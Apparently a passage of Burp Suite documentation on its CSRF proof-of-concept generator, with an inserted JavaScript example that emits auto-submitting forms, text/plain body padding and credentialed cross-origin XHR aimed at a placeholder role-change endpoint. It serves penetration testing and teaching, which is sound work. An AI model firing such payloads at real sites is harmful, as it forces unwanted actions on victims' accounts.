Generate CSRF PoC
This function can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for
a given request.
To access this function, select a URL or HTTP request anywhere within Burp, and choose "Generate CSRF PoC"
within "Engagement tools" in the context menu.
When you execute this function, Burp shows the full request you selected in the top panel, and the generated
You can edit the request manually, and click the "Regenerate" button to regenerate the CSRF HTML based on
the updated request.
You can test the effectiveness of the generated PoC in your browser, using the "Test in browser" button.
When you select this option, Burp gives you a unique URL that you can paste into your browser (configured to
use the current instance of Burp as its proxy). The resulting browser request is served by Burp with the
currently displayed HTML, and you can then determine whether the PoC is effective by monitoring the
resulting request(s) that are made through the Proxy.
Some points should be noted regarding CSRF techniques:
The cross-domain XMLHttpRequest (XHR) technique only works on browsers that support
cross-origin resource sharing (CORS). The technique has been tested on current versions of Firefox,
the application's response is not processed by the browser in the normal way (it is neither rendered
nor readable cross-origin), so it is not suitable for making cross-domain requests to deliver reflected
cross-site scripting (XSS) attacks. Cross-domain XHR is also subject to various restrictions which may
prevent it from working with some request features: for example, it cannot set forbidden request headers
such as Cookie, Host, Origin or Referer, and any non-standard header forces a CORS preflight. Burp
will display a warning in the CSRF PoC generator if this is liable to occur.
Some requests have bodies (e.g. XML or JSON) that can only be generated using either a form with plain
text encoding, or a cross-domain XHR. In the former case, the resulting request will include the header
"Content-Type: text/plain". In the latter case, the request can include any Content-Type header, but
will only qualify as a "simple" cross-domain request (and so avoid the need for a pre-flight request,
which typically breaks the attack because the target does not answer the OPTIONS request with permissive
CORS headers) if the Content-Type header has one of the three values that may be specified for normal
HTML forms: application/x-www-form-urlencoded, multipart/form-data or text/plain. In some cases,
although the message body exactly matches that required for the attack request, the application may
reject the request due to an unexpected Content-Type header (for example, a JSON endpoint that insists
on application/json). Such CSRF-like conditions might not be practically exploitable. Burp will display
a warning in the CSRF PoC generator if this is liable to occur.
If you manually select a CSRF technique that cannot be used to produce the
required request, Burp will generate a best effort at a PoC and will display a warning.
If the CSRF PoC generator is using plain text encoding, then the request body must contain an equals
character in order for Burp to generate an HTML form which results in that exact body. This is because
a browser sends each field of a text/plain form as "name=value" followed by a line break, so Burp places
the text before the first equals character in the field name and the rest in the field value. If the
original request does not contain an equals character, then you may be able to introduce one into a
suitable position in the request, without affecting the server's processing of it (for example, by
adding an unused JSON property whose value contains "=").
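The following is an added example, not Burp's own code, that models how a generator like this one picks a technique and emits the PoC HTML, so that the two rules above (a text/plain form can only reproduce a body containing "=", and a cross-domain XHR only avoids a preflight with a form-style Content-Type) can be exercised directly. The function names, the warning wording and the sample target URL and JSON body are assumptions made for illustration; only POST requests with a body are modelled.

```javascript
// Added example (not Burp's implementation): a small model of how a CSRF PoC
// generator chooses a technique and emits HTML. Only POST bodies are modelled.

// The three Content-Type values an HTML form can produce. Any other value on a
// cross-origin XHR triggers a preflight OPTIONS request, which the target
// almost never answers with permissive CORS headers, so the attack breaks.
const SIMPLE_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// Media type "essence": the value with parameters such as ;charset removed.
function essenceOf(contentType) {
  return (contentType || "").split(";")[0].trim().toLowerCase();
}

function isSimpleContentType(contentType) {
  return SIMPLE_CONTENT_TYPES.has(essenceOf(contentType));
}

// What a browser sends for <form enctype="text/plain">: every field becomes
// "name=value" followed by CRLF. This is why the body must contain an '='.
function encodeTextPlainForm(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// Split a raw body at its first '=' into one text/plain field, or return null
// when there is no '=' and the technique cannot reproduce the body.
function splitForTextPlain(body) {
  const i = body.indexOf("=");
  return i === -1 ? null : { name: body.slice(0, i), value: body.slice(i + 1) };
}

// The body the victim's browser will actually send for the text/plain form
// (the original body plus a trailing CRLF), or null if unusable.
function textPlainBodyFor(body) {
  const f = splitForTextPlain(body);
  return f ? encodeTextPlainForm([[f.name, f.value]]) : null;
}

function parseUrlEncoded(body) {
  return body.split("&").filter(Boolean).map((pair) => {
    const [n, v = ""] = pair.split("=");
    const dec = (s) => decodeURIComponent(s.replace(/\+/g, " "));
    return [dec(n), dec(v)];
  });
}

// Attribute escaping: the browser decodes these entities again, so quotes in
// a JSON body survive the round trip through the hidden input.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function hiddenInput([name, value]) {
  return `<input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}" />`;
}

function formHtml(url, inputs, enctype, autoSubmit) {
  const enc = enctype ? ` enctype="${enctype}"` : "";
  const script = autoSubmit ? "<script>document.forms[0].submit();</script>" : "";
  return `<html><body>\n<form action="${escapeAttr(url)}" method="POST"${enc}>\n` +
    inputs.map((i) => "  " + i).join("\n") +
    `\n  <input type="submit" value="Submit request" />\n</form>\n${script}\n</body></html>`;
}

function xhrHtml(url, contentType, body) {
  // JSON.stringify gives a JS string literal; also neutralise "</script>" inside it.
  const lit = (s) => JSON.stringify(s).replace(/<\//g, "<\\/");
  return `<html><body><script>\nvar xhr = new XMLHttpRequest();\n` +
    `xhr.open("POST", ${lit(url)}, true);\n` +
    `xhr.withCredentials = true; // needed so the victim's cookies are sent cross-origin\n` +
    `xhr.setRequestHeader("Content-Type", ${lit(contentType)});\n` +
    `xhr.send(${lit(body)});\n</script></body></html>`;
}

// Technique selection in the spirit of the "Auto" option: ordinary form first,
// then text/plain form, then XHR, together with the warnings a generator would show.
function generateCsrfPoc({ url, contentType, body, autoSubmit = true }) {
  const warnings = [];
  const ct = essenceOf(contentType);
  if (ct === "application/x-www-form-urlencoded") {
    const inputs = parseUrlEncoded(body).map(hiddenInput);
    return { technique: "form", html: formHtml(url, inputs, null, autoSubmit), warnings };
  }
  const field = splitForTextPlain(body);
  if (field) {
    if (ct !== "text/plain") {
      warnings.push(`request will carry "Content-Type: text/plain" instead of "${contentType}"; the application may reject it`);
    }
    const inputs = [hiddenInput([field.name, field.value])];
    return { technique: "form-text-plain", html: formHtml(url, inputs, "text/plain", autoSubmit), warnings };
  }
  if (!isSimpleContentType(contentType)) {
    warnings.push(`"${contentType}" is not a simple CORS content type; the browser will send a preflight OPTIONS request, which typically breaks the attack`);
  }
  return { technique: "xhr", html: xhrHtml(url, contentType, body), warnings };
}

// Constructed sample (hypothetical target): a JSON body without '=' forces XHR
// and a preflight warning; padding it with an unused property whose value is
// "=" makes the text/plain form usable instead.
const TARGET = "https://target.example/api/role";
const RAW = '{"user":"admin","role":"owner"}';
const PADDED = '{"user":"admin","role":"owner","pad":"="}';
for (const body of [RAW, PADDED]) {
  const poc = generateCsrfPoc({ url: TARGET, contentType: "application/json", body });
  console.log(poc.technique, poc.warnings, "\n" + poc.html + "\n");
}
```

The padded body is the trick described above: the browser emits name, "=", value and a CRLF, so the field name holds everything up to the "=" inside the junk property and the value holds the closing `"}`; most JSON parsers ignore the trailing line break. Note that the XHR variant sets withCredentials, without which the cross-origin request would be sent without the victim's cookies and the PoC would prove nothing.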
CSRF PoC options
The following options are available:
CSRF technique - This option lets you specify the type of CSRF technique to use in the
HTML that generates the CSRF request. The "Auto" option is generally preferred, and causes Burp to
select the most appropriate technique capable of generating the required request.
Include auto-submit script - Using this option causes Burp to include a script in the